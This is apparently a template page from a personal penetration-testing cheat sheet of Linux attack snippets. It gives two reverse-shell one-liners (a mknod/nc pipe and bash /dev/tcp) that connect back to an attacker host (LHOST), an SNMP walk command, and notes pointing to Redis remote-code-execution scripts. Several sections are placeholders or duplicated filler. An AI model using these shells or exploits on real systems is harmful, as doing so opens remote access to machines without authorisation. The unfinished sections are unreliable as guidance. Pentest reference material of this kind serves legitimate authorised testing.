---
layout: base
title: linux
---

<p class="lead">Linux-specific snippets and methods</p>

<!-- Enumeration -->
<h3>Enumeration</h3>




<h3>Entry</h3>

<h5>reverse shells</h5>
{% assign tabs = "rs_mknod|rs_devtcp"%} {% assign tabnames = "mknod method|/dev/tcp method" %} {% assign content =  "
On your local computer:
SCODE
<code>nc -nvlp 443</code><br>
</div>
On remote computer:
SCODE
<code>mknod /tmp/backpipe p && </code><br>
</div>
SCODE
<code>/bin/sh 0< /tmp/backpipe &#124; nc LHOST 443 1> /tmp/backpipe </code>
</div>
|
On local:
SCODE
<code>nc -nvlp 443</code><br>
</div>
On remote:
SCODE
<code>bash -i >& /dev/tcp/LHOST/443 0>&1</code><br>
</div>" %} {% include block.html %}

<h5>ssh // 22</h5>
{% assign tabs = "ssh_bruteforcing|ssh_exploitation"%} {% assign tabnames = "Bruteforcing|Exploitation" %} {% assign content =  "
bruetforcing
|
There won't be any RCE vulnerabilities for OpenBSD ssh. If it's an older version, add an informational vuln. If it's not OpenSSH, <span><code>searchsploit</code></span> it.
" %} {% include block.html %}

<h5>snmp // 161</h5>
{% assign tabs = "snmp_getinfo"%} {% assign tabnames = "Walk to Gather Info" %} {% assign content =  "
Get info from v1 SNMP:
SCODE
<code>snmpwalk -c public -v1 RHOST</code>
</div>
" %} {% include block.html %}
 
<!-- postgres -->
<h5>postgres // 5432</h5>
{% assign tabs = "psql_default_creds|psql_exploitation"%}
{% assign tabnames = "Default Creds|Exploitation"%}
{% assign content = 
"
postgres default creds content here

|

postgres can be 'exploited' with the code exec feature. it's not a real exploit.

"%} {% include block.html %}

<!-- redis -->
<h5>redis // 6379</h5>
{% assign tabs = "redis_creds|redis_exploit"%}
{% assign tabnames = "Default Creds|Exploitation"%}
{% assign content = "

Redis default creds are nonexistent (try with <span><code>rediscli -h RHOST</code></span>).

|

Redis (4.x/5.x) RCE can be achieved through two misconfiguraitons.
<ol>
    <li>Malicious module uploading via <span><code>slaveof</code></span> command (<a href='https://github.com/Ridter/redis-rce'>script</a>)</li>
    <li>Misconfiguration of allowing backup to overwrite SSH <span><code>authorized_keys</code></span> (<a href='https://github.com/Avinash-acid/Redis-Server-Exploit/blob/master/redis.py'>script</a>)</li>
</ol>

"%} {% include block.html %}

<!-- Privesc -->
<h3>Privilege Escalation</h3>
	
<!-- ssh -->
{% assign tabs = "priv1|priv2" %}
{% assign tabnames = "privone|privtwo" %} {% assign content = "
PRIVESC 1

|

PRIVESC2.

" %} {% include block.html %}

<!-- Looting and Scrounging -->
<h3>Looting and Scrounging</h3>

<!-- Other Avenues -->
<h5>Finding other Avenues of Privesc</h5>
{% assign tabs = "other_privesc" %} {% assign tabnames = "Standard Privesc" %}
{% assign content =  "

Lorem ipsum. Other avenues.

|

There won't be any RCE vulnerabilities for OpenBSD ssh. If it's an older version, add an informational vuln. If it's not OpenSSH, <code>searchsploit</code> it.

"%}
{% include block.html %}

<!-- Informational Vulns
<h5>Finding Informational Vulns</h5>  -->



